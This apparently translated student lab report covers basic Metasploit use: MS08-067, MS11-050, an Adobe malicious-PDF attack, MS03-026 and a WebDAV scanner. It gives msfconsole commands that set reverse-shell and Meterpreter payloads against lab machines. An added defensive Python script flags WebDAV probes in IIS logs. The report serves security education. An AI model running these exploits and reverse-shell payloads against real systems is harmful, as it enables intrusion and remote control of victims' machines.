20155229 "Network Countermeasures Technology" Exp5: MSF Basic Application

Experimental content

The goal of this practice is to master the basic use of Metasploit, focusing on the ideas behind three commonly used attack methods. Specifically, the following must be completed:

  • an active attack practice, such as MS08-067;

  • an attack against browsers, such as MS11-050;

  • a client-side attack, such as one against Adobe Reader;

  • successful application of any auxiliary module;

  • the four small practices above are not limited to the examples given, and at least one of them must differ from those of all other students.


Active Attack Practice: MS08-067 Vulnerability

  • msfconsole: enter the msf console
  • search ms08_067: look up this vulnerability

  • use exploit/windows/smb/ms08_067_netapi: use this exploit
  • show payloads: list the reverse-connection attack payloads

  • set payload generic/shell_reverse_tcp: TCP reverse connection

  • set LHOST 192.168.126.128: the attacker's IP address

  • set LPORT 5229: the attacker's listening port

  • set RHOST 192.168.126.136: the IP address of the target machine

  • set target 0: select the target system type

  • exploit: launch the attack

  • The following figure shows the successful attack.

  • ipconfig: entered in the session from Kali, this displays the IP address of the target machine

  • Checking the IP address of the target machine in XP shows that the two are exactly the same.

Browser Attack: MS11-050

  • msfconsole: enter the console

  • use windows/browser/ms11_050_mshtml_cobjectelement: use the MS11-050 vulnerability

  • set payload windows/meterpreter/reverse_http: use an HTTP reverse connection

  • set LHOST 192.168.126.128: set the IP address of Kali
  • set LPORT 5229: set the port
  • set URIPATH fyh5229: set the resource identifier path
  • exploit: launch the attack


Enter the URL with the local IP shown in the picture above into the IE browser in Windows XP; a window appears saying that a problem was encountered and the program needs to close. At the same time, 360 gives a notice that something needs to be repaired.

  • But back in Kali, no session is established, and the IE browser has closed the page.

  • I set the browser's options, set the security level to the lowest level, and enabled the plug-in settings, but the session connection still failed...

I will look into this.

Client-Side Attack: Adobe

  • msfconsole: enter the msf console
  • search adobe: find vulnerabilities related to Adobe

  • I chose windows/fileformat/adobe_cooltype_sing

  • set payload windows/meterpreter/reverse_tcp: reverse connection using TCP

  • Set the IP address and port number
  • set FILENAME 5229.pdf: name the PDF file to be generated
  • exploit: generate the file

  • The figure below shows the sign of successfully generating a PDF file.

  • According to the storage path, find the PDF file and put it on the target machine.
  • But I couldn't find the file after searching for a long time. Later, as shown in the figure below, I selected 显示隐藏文件 (show hidden files), and then I could find the hidden folder.

  • I first copied the modified file onto my host, and it was immediately deleted by 360.

  • Enter listening mode in msf
  • set payload windows/meterpreter/reverse_tcp: TCP reverse connection
  • Set the IP address and port number
  • exploit: start listening

  • Open the 5229.pdf file on XP, and the attack succeeds in Kali.

  • Enter ipconfig; the IP address of XP is displayed, which proves that the attack worked.


Auxiliary Module: webdav

WebDAV is a communication protocol based on the HTTP 1.1 protocol. Because WebDAV is integrated with Windows XP and IIS, it has the security features provided by both. These include IIS permissions specified in the Internet Information Services snap-in and discretionary access control lists (DACLs) in the NTFS file system.

  • Enter the msf console
  • show auxiliary: display all auxiliary modules and their purposes

  • use scanner/http/webdav_scanner: choose the scanner module
  • show options: view the configuration options for this module

  • Set the IP address of the target and the number of threads
  • run the scan

  • The result of the scan is shown in the figure above, but the target machine does not have IIS installed.
  • Refer to "how to enable IIS" to install IIS on the Windows XP system.

  • After enabling WebDAV and scanning again, the message [*] 192.168.126.128 (Microsoft-IIS/6.0) has WEBDAV ENABLED is shown.
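The Metasploit webdav_scanner module identifies WebDAV by sending an HTTP OPTIONS request and reading the server's DAV header. From the server's side that probe shows up in the IIS W3C log as OPTIONS (and often PROPFIND) requests, which a normal browser session does not send. The following detector, added here as an example and not part of the lab report, parses IIS W3C extended log lines and reports clients that issued WebDAV discovery methods; the log lines are constructed for the example.

```python
"""Flag clients probing for WebDAV in IIS W3C extended logs (added example)."""
from collections import defaultdict

# Methods used for WebDAV discovery; a plain browsing session never sends them.
DAV_METHODS = {"OPTIONS", "PROPFIND"}

# Constructed sample log in IIS 6.0 W3C extended format (not real data).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2019-04-21 10:01:02 192.168.126.136 GET /index.htm - 80 - 192.168.126.1 Mozilla/4.0 200 0 0
2019-04-21 10:01:05 192.168.126.136 OPTIONS / - 80 - 192.168.126.128 Mozilla/4.0 200 0 0
2019-04-21 10:01:05 192.168.126.136 PROPFIND / - 80 - 192.168.126.128 Mozilla/4.0 207 0 0
2019-04-21 10:02:10 192.168.126.136 GET /logo.gif - 80 - 192.168.126.1 Mozilla/4.0 200 0 0
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # skip malformed lines instead of misaligning columns
        yield dict(zip(fields, parts))


def find_webdav_probes(text):
    """Return {client_ip: sorted DAV methods} for clients that sent discovery requests."""
    hits = defaultdict(set)
    for rec in parse_w3c(text):
        method = rec["cs-method"].upper()
        if method in DAV_METHODS:
            hits[rec["c-ip"]].add(method)
    return {ip: sorted(methods) for ip, methods in hits.items()}


if __name__ == "__main__":
    for ip, methods in find_webdav_probes(SAMPLE_LOG).items():
        print(f"{ip} sent WebDAV discovery methods: {', '.join(methods)}")
```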

RPC Interface Long Hostname Remote Buffer Overflow Vulnerability (MS03-026)

  • Remote Procedure Call (RPC) is a remote procedure call protocol used by the Windows operating system. RPC provides an inter-process communication mechanism that allows a program running on one computer to seamlessly execute code on a remote system.

  • use exploit/windows/dcerpc/ms03_026_dcom: use this exploit
  • set payload windows/meterpreter/reverse_tcp: TCP reverse connection
  • show options: view the configuration options for this exploit

  • set LHOST 192.168.126.128: set the attacking host's IP

  • set RHOST 192.168.126.137: set the IP of the target whose shell is to be bounced back

  • The exploit runs to completion, but no session is established.

Situations in which the message "No session was created" occurs:

① The exploit used does not work against the selected target. It may be a different version of the vulnerability, or the target may be misconfigured.

② The exploit you used is configured with a payload that does not create an interactive session.


Post-Experiment Questions and Answers

  • Explain in your own words what exploit, payload and encode are.

  • exploit: the English word translates as 利用 (to make use of); hackers use loopholes to attack computers. There are loopholes that may not be exploited, but there must be loopholes that can be exploited.
  • payload: the payload. Usually when transmitting data, in order to make the transmission more reliable, the original data is transmitted in batches and certain auxiliary information is added to the head and tail of each batch; the original data is the payload.
  • encode: the encoder, used to encode the payload so that it is not discovered.


Experiment Summary and Experience

This experiment is actually not difficult, but that does not mean that every attack can succeed, nor that every attack can successfully establish a session. I ran several experiments, only a few of them succeeded, and I did not write down some of the failures.

Although most of them failed, there is no doubt that I learned a lot of knowledge in this experiment by looking up the vulnerabilities in the reference material and studying on my own.

Origin http://43.154.161.224:23101/article/api/json?id=325083506&siteId=291194637